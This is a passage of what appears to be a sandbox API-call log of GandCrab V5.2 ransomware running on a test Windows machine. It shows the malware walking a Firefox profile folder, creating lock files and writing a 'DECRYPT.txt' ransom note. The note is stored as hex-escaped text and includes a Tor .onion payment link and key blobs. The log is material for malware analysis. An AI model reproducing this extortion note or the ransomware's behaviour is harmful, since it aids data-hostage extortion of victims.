a\x44\x48\x33\x4f\x49\x6d\x56\x75\x69\x6e\x67\x31\x6c\x31\x65\x62\x63\x65\x42\x53\x45\x6a\x6f\x36\x52\x61\x36\x7a\x67\x75\x31\x4d\x6a\x32\x63\x58\x39\x57\x4d\x77\x31\x50\x78\x30\x53\x64\x32\x6c\x4d\x75\x77\x6d\x51\x6b\x34\x30\x36\x4f\x49\x64\x4c\x64\x55\x64\x34\x67\x6c\x71\x66\x30\x55\x48\x72\x38\x64\x66\x47\x4a\x79\x66\x62\x61\x4a\x45\x4c\x63\x74\x56\x36\x67\x36\x2b\x6e\x35\x66\x44\x71\x36\x56\x51\x41\x30\x72\x78\x78\x74\x79\x76\x6b\x43\x74\x68\x6d\x52\x4c\x73\x54\x67\x66\x4f\x6f\x58\x65\x34\x47\x37\x68\x39\x69\x4e\x75\x65\x73\x6f\x4d\x72\x30\x50\x6f\x61\x38\x6b\x4a\x5a\x54\x56\x68\x66\x33\x77\x54\x2f\x75\x75\x79\x64\x4d\x79\x55\x70\x63\x6c\x53\x49\x6a\x71\x2b\x66\x55\x49\x52\x72\x2b\x37\x6b\x2f\x57\x39\x4f\x39\x56\x73\x79\x32\x4e\x63\x78\x35\x70\x66\x2b\x53\x2b\x4d\x72\x4c\x31\x41\x6d\x35\x52\x51\x69\x33\x63\x36\x78\x46\x65\x54\x78\x33\x4d\x63\x5a\x52\x38\x30\x6e\x56\x69\x6e\x68\x75\x59\x6c\x69\x52\x51\x68\x4b\x4e\x6f\x4e\x57\x49\x32\x67\x48\x61\x47\x36\x6c\x52\x75\x7a\x2b\x51\x68\x47\x30\x52\x70\x4d\x59\x62\x7a\x42\x67\x4f\x6a\x35\x68\x69\x2f\x63\x63\x79\x55\x79\x68\x4d\x35\x66\x55\x49\x67\x63\x4a\x31\x39\x6c\x50\x64\x63\x6d\x76\x69\x78\x47\x6c\x6b\x35\x52\x38\x72\x6b\x32\x5a\x66\x78\x68\x4a\x78\x72\x46\x49\x75\x4c\x51\x54\x73\x52\x72\x61\x69\x77\x63\x44\x4d\x54\x41\x6d\x39\x63\x38\x6b\x64\x72\x2f\x59\x66\x34\x51\x6e\x2b\x62\x76\x37\x79\x4a\x5a\x34\x59\x58\x67\x42\x38\x45\x64\x6c\x31\x58\x64\x53\x6e\x4d\x72\x55\x50\x56\x35\x6f\x72\x63\x42\x78\x33\x32\x65\x73\x48\x6c\x31\x62\x46\x48\x6b\x65\x73\x39\x5a\x39\x66\x77\x6a\x46\x46\x78\x35\x42\x2f\x43\x72\x79\x6e\x36\x49\x30\x62\x54\x68\x36\x53\x78\x71\x78\x53\x4d\x4b\x66\x61\x77\x6c\x59\x6a\x57\x52\x79\x70\x35\x79\x58\x74\x4e\x69\x62\x62\x2b\x63\x7a\x78\x54\x77\x67\x30\x35\x57\x45\x56\x69\x44\x6a\x32\x5a\x4d\x35\x56\x46\x45\x35\x67\x39\x6a\x56\x78\x31\x7a\x4c\x67\x4c\x36\x72\x45\x6f\x78\x76\x62\x50\x33\x2f\x6f\x57\x73\x72\x33\x72\x72\x35\x38\x63\x71\x62\x45\x36\x49\x49\x48\x34\x6b\x33\x74\x74\x34\x75\x37\x69\x71\x7a\x66\x55\x6b\x4a\x6d\x48\x2b\x38\x31\x76\x5a\x62\x56\x7a\x59\x48\x63\x36\x48\x51\x4c\x2f\x56\x4c\x6d\x74\x2b\x59\x37\x68\x52\x6b\x36\x79\x6f\x72\x53\x6a\x31\x70\x6d\x69\x50\x46\x72\x58\x4c\x39\x39\x57\x72\x62\x6c\x41\x59\x36\x4e\x71\x79\x68\x32\x6d\x78\x2f\x6a\x4b\x44\x58\x4d\x5a\x7a\x64\x6c\x55\x51\x32\x4d\x35\x67\x6a\x56\x6c\x38\x36\x6c\x4e\x43\x6f\x33\x37\x4c\x44\x4c\x56\x48\x55\x4a\x64\x38\x73\x75\x41\x37\x78\x48\x61\x76\x47\x4b\x4d\x42\x7a\x7a\x78\x38\x35\x70\x2b\x4a\x2f\x55\x56\x39\x57\x50\x58\x6e\x72\x75\x45\x41\x3d\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d\x0d\x0a\x37\x66\x74\x44\x45\x67\x4c\x62\x2f\x5a\x53\x30\x6c\x63\x6d\x5a\x62\x48\x4d\x36\x31\x4b\x4c\x4a\x78\x51\x4f\x70\x44\x35\x34\x4b\x6b\x77\x36\x53\x62\x73\x73\x67\x66\x33\x59\x41\x57\x4f\x4d\x43\x79\x70\x2b\x4b\x59\x42\x78\x78\x47\x32\x44\x64\x39\x4d\x50\x4a\x45\x70\x44\x37\x41\x73\x6d\x56\x67\x4f\x43\x39\x52\x57\x66\x49\x52\x48\x51\x70\x51\x78\x47\x61\x31\x4c\x50\x47\x7a\x72\x45\x53\x47\x2b\x67\x67\x61\x72\x47\x58\x6f\x36\x62\x63\x47\x50\x4d\x70\x59\x30\x75\x48\x49\x6b\x6d\x67\x32\x38\x51\x55\x71\x68\x54\x73\x67\x6b\x67\x59\x58\x56\x70\x69\x44\x63\x46\x77\x69\x58\x48\x2f\x67\x6c\x4b\x56\x57\x6f\x56\x48\x4b\x43\x50\x5a\x4d\x70\x76\x37\x34\x43\x5a\x32\x4f\x38\x51\x33\x7a\x57\x61\x78\x30\x4b\x49\x52\x43\x2f\x6f\x76\x45\x74\x76\x42\x6d\x64\x6c\x53\x73\x70\x6d\x48\x4e\x76\x55\x46\x49\x4b\x6c\x30\x57\x59\x4e\x61\x41\x79\x77\x30\x53\x4b\x36\x62\x44\x4c\x6c\x46\x33\x79\x50\x71\x42\x35\x67\x6d\x61\x62\x46\x2b\x5a\x2f\x58\x4d\x47\x64\x33\x73\x67\x44\x37\x32\x35\x4a\x33\x2f\x55\x77\x42\x37\x77\x39\x78\x45\x57\x4c\x30\x79\x37\x34\x58\x71\x35\x33\x74\x48\x52\x6e\x4b\x53\x4d\x4a\x2b\x42\x6c\x31\x44\x7a\x65\x69\x71\x6f\x39\x46\x72\x64\x6e\x4d\x4b\x5a\x37\x31\x39\x47\x53\x56\x66\x4f\x2b\x54\x41\x69\x6d\x4c\x72\x37\x73\x34\x43\x75\x47\x41\x73\x70\x43\x61\x6a\x71\x52\x54\x77\x56\x66\x50\x66\x32\x30\x78\x42\x53\x55\x69\x44\x49\x74\x4c\x4f\x4a\x64\x4e\x41\x46\x42\x6e\x56\x71\x72\x4d\x5a\x6f\x52\x2b\x53\x33\x4e\x4c\x47\x59\x6d\x64\x61\x52\x33\x30\x66\x52\x50\x39\x33\x79\x71\x50\x4d\x77\x4c\x4f\x4c\x6a\x54\x36\x4f\x36\x72\x31\x78\x57\x34\x65\x5a\x78\x54\x7a\x50\x4a\x31\x66\x62\x44\x4c\x30\x39\x30\x30\x50\x66\x36\x53\x30\x61\x7a\x37\x4b\x41\x76\x6f\x54\x66\x46\x70\x35\x32\x47\x50\x44\x4b\x78\x35\x43\x68\x42\x75\x64\x72\x6f\x4d\x31\x6f\x4f\x36\x69\x71\x56\x77\x75\x6d\x32\x71\x42\x6c\x76\x5a\x4c\x77\x4b\x72\x74\x4d\x79\x70\x53\x38\x45\x31\x66\x6d\x6c\x58\x7a\x6d\x5a\x37\x71\x64\x34\x42\x75\x77\x75\x67\x57\x43\x77\x59\x30\x7a\x56\x62\x35\x51\x66\x76\x64\x78\x47\x4c\x53\x75\x6a\x37\x62\x69\x41\x77\x44\x50\x69\x71\x54\x4f\x4c\x4b\x50\x47\x67\x6a\x34\x32\x59\x57\x4b\x62\x2b\x2b\x41\x6c\x53\x76\x48\x75\x69\x7a\x34\x45\x59\x45\x71\x42\x45\x36\x69\x4e\x6e\x41\x4e\x66\x68\x77\x4e\x51\x4c\x49\x45\x7a\x31\x52\x6b\x48\x4b\x79\x62\x75\x4d\x4b\x70\x31\x52\x31\x6c\x51\x2f\x70\x75\x51\x65\x65\x7a\x77\x45\x69\x58\x54\x45\x43\x72\x37\x72\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d") returned 4273 [0084.499] WriteFile (in: hFile=0x2e0, lpBuffer=0x2300000*, nNumberOfBytesToWrite=0x2162, lpNumberOfBytesWritten=0x259ddd4, lpOverlapped=0x0 | out: lpBuffer=0x2300000*, lpNumberOfBytesWritten=0x259ddd4*=0x2162, lpOverlapped=0x0) returned 1 [0084.500] CloseHandle (hObject=0x2e0) returned 1 [0084.500] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.500] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0084.500] GetSystemTime (in: lpSystemTime=0x1e70400 | out: lpSystemTime=0x1e70400*(wYear=0x7e3, wMonth=0x2, wDayOfWeek=0x1, wDay=0x12, wHour=0x11, wMinute=0x13, wSecond=0x1d, wMilliseconds=0x328)) [0084.500] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2310000 [0084.501] GetWindowsDirectoryW (in: lpBuffer=0x2310000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0084.501] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2310200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2310600, lpMaximumComponentLength=0x2310608, lpFileSystemFlags=0x2310604, lpFileSystemNameBuffer=0x2310400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2310600*=0xd2ca4def, lpMaximumComponentLength=0x2310608*=0xff, lpFileSystemFlags=0x2310604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0084.501] wsprintfW (in: param_1=0x1e70000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\chrome\\idb\\d2ca4a09d2ca4deb61a.lock") returned 133 [0084.501] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\chrome\\idb\\d2ca4a09d2ca4deb61a.lock" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\storage\\permanent\\chrome\\idb\\d2ca4a09d2ca4deb61a.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x2e0 [0084.502] VirtualFree (lpAddress=0x2310000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.502] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.502] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\chrome\\idb\\") returned 109 [0084.502] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\chrome\\idb\\", lpString2="*" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\chrome\\idb\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\chrome\\idb\\*" [0084.502] FindFirstFileExW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\chrome\\idb\\*", fInfoLevelId=0x1, lpFindFileData=0x259ddf0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x259ddf0) returned 0x503738 [0084.503] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0084.503] FindNextFileW (in: hFindFile=0x503738, lpFindFileData=0x259ddf0 | out: lpFindFileData=0x259ddf0) returned 1 [0084.504] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0084.504] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0084.504] FindNextFileW (in: hFindFile=0x503738, lpFindFileData=0x259ddf0 | out: lpFindFileData=0x259ddf0) returned 1 [0084.504] lstrcmpW (lpString1="2918063365piupsah.files", lpString2=".") returned 1 [0084.504] lstrcmpW (lpString1="2918063365piupsah.files", lpString2="..") returned 1 [0084.504] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\chrome\\idb\\", lpString2="2918063365piupsah.files" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\chrome\\idb\\2918063365piupsah.files") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\chrome\\idb\\2918063365piupsah.files" [0084.504] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\chrome\\idb\\2918063365piupsah.files", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\chrome\\idb\\2918063365piupsah.files\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\chrome\\idb\\2918063365piupsah.files\\" [0084.504] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x1e70000 [0084.504] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0084.504] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0084.504] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0084.504] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0084.504] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0084.505] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0084.505] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0084.505] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0084.505] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.505] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0084.505] wsprintfW (in: param_1=0x1e70200, param_2="%s\\%s-DECRYPT.txt" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\chrome\\idb\\2918063365piupsah.files\\\\TITWMVJL-DECRYPT.txt") returned 154 [0084.505] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\chrome\\idb\\2918063365piupsah.files\\\\TITWMVJL-DECRYPT.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\storage\\permanent\\chrome\\idb\\2918063365piupsah.files\\titwmvjl-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e8 [0084.506] lstrlenW (lpString="\xfeff\x2d\x2d\x2d\x3d\x20\x20\x20\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x56\x35\x2e\x32\x20\x20\x20\x20\x3d\x2d\x2d\x2d\x20\x0d\x0a\x0d\x0a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x55\x4e\x44\x45\x52\x20\x4e\x4f\x20\x43\x49\x52\x43\x55\x4d\x53\x54\x41\x4e\x43\x45\x53\x20\x44\x4f\x20\x4e\x4f\x54\x20\x44\x45\x4c\x45\x54\x45\x20\x54\x48\x49\x53\x20\x46\x49\x4c\x45\x2c\x20\x55\x4e\x54\x49\x4c\x20\x41\x4c\x4c\x20\x59\x4f\x55\x52\x20\x44\x41\x54\x41\x20\x49\x53\x20\x52\x45\x43\x4f\x56\x45\x52\x45\x44\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x09\x2a\x2a\x2a\x2a\x2a\x46\x41\x49\x4c\x49\x4e\x47\x20\x54\x4f\x20\x44\x4f\x20\x53\x4f\x2c\x20\x57\x49\x4c\x4c\x20\x52\x45\x53\x55\x4c\x54\x20\x49\x4e\x20\x59\x4f\x55\x52\x20\x53\x59\x53\x54\x45\x4d\x20\x43\x4f\x52\x52\x55\x50\x54\x49\x4f\x4e\x2c\x20\x49\x46\x20\x54\x48\x45\x52\x45\x20\x41\x52\x45\x20\x44\x45\x43\x52\x59\x50\x54\x49\x4f\x4e\x20\x45\x52\x52\x4f\x52\x53\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x41\x74\x74\x65\x6e\x74\x69\x6f\x6e\x21\x20\x0d\x0a\x0d\x0a\x41\x6c\x6c\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2c\x20\x64\x6f\x63\x75\x6d\x65\x6e\x74\x73\x2c\x20\x70\x68\x6f\x74\x6f\x73\x2c\x20\x64\x61\x74\x61\x62\x61\x73\x65\x73\x20\x61\x6e\x64\x20\x6f\x74\x68\x65\x72\x20\x69\x6d\x70\x6f\x72\x74\x61\x6e\x74\x20\x66\x69\x6c\x65\x73\x20\x61\x72\x65\x20\x65\x6e\x63\x72\x79\x70\x74\x65\x64\x20\x61\x6e\x64\x20\x68\x61\x76\x65\x20\x74\x68\x65\x20\x65\x78\x74\x65\x6e\x73\x69\x6f\x6e\x3a\x20\x2e\x54\x49\x54\x57\x4d\x56\x4a\x4c\x20\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x6f\x6e\x6c\x79\x20\x6d\x65\x74\x68\x6f\x64\x20\x6f\x66\x20\x72\x65\x63\x6f\x76\x65\x72\x69\x6e\x67\x20\x66\x69\x6c\x65\x73\x20\x69\x73\x20\x74\x6f\x20\x70\x75\x72\x63\x68\x61\x73\x65\x20\x61\x6e\x20\x75\x6e\x69\x71\x75\x65\x20\x70\x72\x69\x76\x61\x74\x65\x20\x6b\x65\x79\x2e\x20\x4f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x67\x69\x76\x65\x20\x79\x6f\x75\x20\x74\x68\x69\x73\x20\x6b\x65\x79\x20\x61\x6e\x64\x20\x6f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x72\x65\x63\x6f\x76\x65\x72\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2e\x0d\x0a\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x73\x65\x72\x76\x65\x72\x20\x77\x69\x74\x68\x20\x79\x6f\x75\x72\x20\x6b\x65\x79\x20\x69\x73\x20\x69\x6e\x20\x61\x20\x63\x6c\x6f\x73\x65\x64\x20\x6e\x65\x74\x77\x6f\x72\x6b\x20\x54\x4f\x52\x2e\x20\x59\x6f\x75\x20\x63\x61\x6e\x20\x67\x65\x74\x20\x74\x68\x65\x72\x65\x20\x62\x79\x20\x74\x68\x65\x20\x66\x6f\x6c\x6c\x6f\x77\x69\x6e\x67\x20\x77\x61\x79\x73\x3a\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x7c\x20\x30\x2e\x20\x44\x6f\x77\x6e\x6c\x6f\x61\x64\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x2d\x20\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x74\x6f\x72\x70\x72\x6f\x6a\x65\x63\x74\x2e\x6f\x72\x67\x2f\x20\x0d\x0a\x0d\x0a\x7c\x20\x31\x2e\x20\x49\x6e\x73\x74\x61\x6c\x6c\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x32\x2e\x20\x4f\x70\x65\x6e\x20\x54\x6f\x72\x20\x42\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x33\x2e\x20\x4f\x70\x65\x6e\x20\x6c\x69\x6e\x6b\x20\x69\x6e\x20\x54\x4f\x52\x20\x62\x72\x6f\x77\x73\x65\x72\x3a\x20\x20\x20\x68\x74\x74\x70\x3a\x2f\x2f\x67\x61\x6e\x64\x63\x72\x61\x62\x6d\x66\x65\x36\x6d\x6e\x65\x66\x2e\x6f\x6e\x69\x6f\x6e\x2f\x39\x39\x38\x61\x32\x66\x34\x35\x64\x32\x63\x61\x34\x64\x65\x66\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x7c\x20\x34\x2e\x20\x46\x6f\x6c\x6c\x6f\x77\x20\x74\x68\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x74\x68\x69\x73\x20\x70\x61\x67\x65\x20\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x4f\x6e\x20\x6f\x75\x72\x20\x70\x61\x67\x65\x20\x79\x6f\x75\x20\x77\x69\x6c\x6c\x20\x73\x65\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x70\x61\x79\x6d\x65\x6e\x74\x20\x61\x6e\x64\x20\x67\x65\x74\x20\x74\x68\x65\x20\x6f\x70\x70\x6f\x72\x74\x75\x6e\x69\x74\x79\x20\x74\x6f\x20\x64\x65\x63\x72\x79\x70\x74\x20\x31\x20\x66\x69\x6c\x65\x20\x66\x6f\x72\x20\x66\x72\x65\x65\x2e\x20\x0d\x0a\x0d\x0a\x0d\x0a\x41\x54\x54\x45\x4e\x54\x49\x4f\x4e\x21\x0d\x0a\x0d\x0a\x49\x4e\x20\x4f\x52\x44\x45\x52\x20\x54\x4f\x20\x50\x52\x45\x56\x45\x4e\x54\x20\x44\x41\x54\x41\x20\x44\x41\x4d\x41\x47\x45\x3a\x0d\x0a\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x4d\x4f\x44\x49\x46\x59\x20\x45\x4e\x43\x52\x59\x50\x54\x45\x44\x20\x46\x49\x4c\x45\x53\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x43\x48\x41\x4e\x47\x45\x20\x44\x41\x54\x41\x20\x42\x45\x4c\x4f\x57\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x6c\x41\x51\x41\x41\x42\x42\x6a\x58\x74\x68\x4a\x35\x51\x30\x77\x50\x44\x4f\x69\x52\x2f\x55\x55\x71\x42\x6a\x71\x4e\x47\x47\x52\x4d\x53\x45\x54\x66\x6e\x4b\x46\x4e\x2f\x77\x43\x30\x5a\x32\x79\x38\x75\x58\x4e\x4b\x2f\x63\x51\x52\x78\x51\x2b\x75\x78\x6a\x76\x48\x59\x6f\x52\x4e\x57\x4b\x4f\x77\x79\x70\x66\x53\x6e\x77\x69\x73\x61\x7a\x66\x6f\x32\x49\x75\x35\x76\x57\x57\x2b\x52\x43\x6b\x47\x47\x42\x31\x47\x6e\x65\x73\x51\x6b\x51\x77\x75\x54\x32\x41\x5a\x78\x56\x78\x35\x51\x59\x34\x69\x65\x2b\x6c\x65\x57\x2f\x4d\x5a\x41\x77\x47\x50\x70\x7a\x38\x2f\x37\x64\x5a\x77\x6f\x4c\x2b\x55\x71\x71\x4f\x77\x4d\x70\x54\x47\x33\x2b\x41\x6e\x76\x45\x51\x33\x4c\x4d\x6e\x49\x69\x51\x63\x70\x34\x48\x44\x66\x64\x33\x38\x4d\x50\x52\x43\x73\x52\x36\x67\x71\x63\x49\x48\x6f\x42\x70\x55\x4c\x77\x43\x33\x47\x6d\x37\x78\x7a\x74\x5a\x42\x69\x48\x47\x5a\x67\x5a\x56\x37\x4c\x6e\x61\x67\x51\x6b\x72\x4f\x41\x6c\x77\x54\x31\x36\x69\x70\x71\x4c\x31\x7a\x58\x54\x34\x6b\x4f\x79\x47\x45\x5a\x4c\x53\x6c\x71\x36\x48\x52\x57\x72\x52\x4a\x6b\x59\x53\x51\x35\x7a\x4c\x74\x50\x31\x54\x6b\x34\x68\x6d\x6d\x42\x51\x31\x66\x6f\x6a\x57\x46\x72\x63\x6f\x54\x34\x36\x78\x63\x76\x57\x2b\x33\x53\x33\x30\x6e\x56\x30\x46\x43\x51\x59\x64\x6a\x35\x68\x48\x66\x62\x50\x6c\x62\x4f\x52\x5a\x72\x69\x34\x6e\x2b\x65\x55\x43\x49\x6c\x46\x31\x74\x4b\x78\x62\x45\x69\x51\x74\x4a\x4e\x74\x66\x66\x74\x31\x76\x6b\x59\x31\x62\x6e\x78\x49\x64\x74\x45\x74\x57\x62\x49\x4e\x77\x6c\x75\x6e\x2f\x31\x39\x37\x67\x4f\x72\x72\x49\x58\x4a\x2b\x45\x70\x37\x61\x31\x73\x34\x68\x41\x54\x32\x6b\x45\x6b\x6d\x31\x48\x55\x4e\x39\x39\x46\x55\x4d\x7a\x2b\x49\x73\x51\x45\x4b\x35\x41\x44\x59\x6d\x35\x4a\x73\x42\x55\x61\x63\x59\x6c\x58\x52\x65\x77\x77\x78\x4e\x41\x55\x67\x6b\x77\x54\x51\x31\x69\x78\x57\x48\x63\x68\x36\x4c\x4e\x66\x6f\x46\x62\x78\x2f\x59\x30\x51\x67\x6c\x59\x47\x6c\x37\x36\x62\x4c\x67\x6c\x6a\x67\x6c\x50\x69\x61\x72\x2b\x46\x4d\x6d\x73\x4a\x6b\x48\x44\x78\x58\x46\x41\x64\x70\x56\x50\x4d\x4b\x54\x2b\x50\x70\x63\x6e\x32\x67\x31\x52\x65\x6f\x6d\x79\x5a\x73\x41\x77\x33\x30\x68\x4e\x4d\x79\x59\x43\x74\x79\x7a\x59\x56\x6d\x51\x7a\x4e\x56\x56\x77\x65\x76\x4d\x6b\x70\x71\x33\x44\x66\x76\x30\x76\x48\x65\x43\x6a\x58\x63\x30\x71\x67\x72\x38\x48\x53\x78\x6f\x57\x53\x6c\x56\x42\x7a\x55\x4c\x72\x47\x64\x77\x71\x7a\x61\x62\x59\x79\x6f\x72\x78\x32\x77\x62\x32\x6c\x50\x71\x6e\x43\x73\x4c\x2f\x59\x4f\x74\x63\x72\x69\x65\x50\x62\x77\x73\x57\x59\x46\x5a\x51\x47\x46\x63\x31\x4a\x6f\x71\x4a